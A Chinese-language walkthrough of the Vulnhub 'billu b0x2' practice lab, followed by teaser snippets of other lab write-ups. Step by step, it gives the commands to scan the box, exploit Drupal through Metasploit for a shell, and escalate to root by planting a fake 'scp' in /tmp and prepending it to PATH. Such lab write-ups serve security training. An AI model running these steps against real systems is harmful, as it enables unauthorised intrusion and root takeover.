Vulnhub靶場練習 billu b0x2

2022-01-17 06:17:24 字數 2085 閱讀 6444

一、環境搭建

2、靶場環境為.ova格式,使用oracle vm virtualbox虛擬機器軟體匯入即可

3、啟動靶場環境,為了方便練習,已經設定虛擬機器網路的橋接模式

二、攻略步驟

1、因為靶場啟動之後,首頁直接出現了ip位址,所以省略了收集ip的步驟,直接掃瞄埠,尋找突破點

輸入命令:nmap 192.168.0.102 -p- -t4

發現有開啟80埠,一般突破點都是從http網頁上邊來突破,所以可以直接訪問尋找突破口

2、開啟瀏覽器訪問之後,發現有登入框,搜尋框,**為drupal框架

3、使用dirb進一步掃瞄探測目錄,看是否有更多檔案,發現robots.txt檔案

訪問之後,發現更多資訊洩漏的檔案

3、根據掃瞄的目錄,發現有/core/install.php頁面,訪問得到drupal框架具體版本

4、drupal有乙個注入漏洞,可getshell,所以可以嘗試一下,啟動msf來直接利用

輸入命令:msfconsole,啟動msf

輸入命令:search drupal,來搜尋要使用的針對drupal攻擊的利用指令碼

輸入命令:show options,顯示需要利用指令碼的話要設定的引數

指令碼要設定的引數已經設定了預設的部分,只要設定rhosts攻擊的目標位址就行

輸入命令:set rhosts 192.168.0.102,設定要攻擊的目標ip

最後輸入命令:run,執行攻擊,成功getshell

5、當前shell互動如果覺得不舒服,可以執行python -c 'import pty; pty.spawn("/bin/bash")'  來獲得互動shell

6、因為目標設定的為需要root許可權,當前許可權僅為www-data使用者許可權,所以下一步需要提權

輸入命令:uname -a,檢視當前系統核心版本

7、收集系統下檔案資訊,在/opt目錄下,發現乙個檔名為s的可疑檔案,所有許可權都為root

8、使用strings命令,檢視二進位制,發現在執行scp命令時候使用root許可權,但是沒有指定root下的絕對路徑

9、根據上邊得到的資訊,我們可以建立乙個假的scp命令之後,將假的scp命令新增到環境變數之中來實現提權

輸入命令:cd /tmp,切換進入到/tmp臨時目錄

輸入命令:echo "/bin/bash" > scp,將執行「/bin/bash" shell的命令寫入到名字為scp的檔案之後

輸入命令:chmod +x scp,賦予scp檔案執行許可權

輸入命令: export path=/tmp:$path ,將/tmp目錄追加到現有的環境變數之中

輸入命令:cd /opt,切換回之前的/opt目錄之中

輸入命令: ./s,執行s指令碼,成功提權

Vulnhub靶場第四關

vulnhub靶場 acid 目標 獲得root許可權和flag 執行環境 靶機配置 該虛擬機器完全基於web,提取rar並使用vmplayer執行vmx,網路連線方式設定為net,靶機自動獲取ip。攻擊機配置 同網段下有windows攻擊機,安裝有burpsuit nc python2.7 dir...

Vulnhub實戰靶場 DC 4

一 環境搭建 3 為了正常練習,將靶場的網絡卡模式設定為橋接模式,啟動即可 二 靶場攻略 2 使用命令 nmap a p 192.168.1.7,尋找突破口,發現開啟80和22埠 4 得到乙個命令執行的地方 可以檢視檔案 再次使用burpsuite抓包,通過修改radio引數,可以執行系統命令 5 ...

CSRF靶場練習

了解csrf跨站偽造請求實驗 從上圖可以看出,要完成一次csrf攻擊,受害者必須依次完成兩個步驟 登入受信任 a,並在本地生成 在不登出a的情況下,訪問危險 b。學習csrf 實驗環境描述 1 學生機與實驗室網路直連 2 vpc1與實驗室網路直連 3 學生機與vpc1物理鏈路連通 pc機 windo...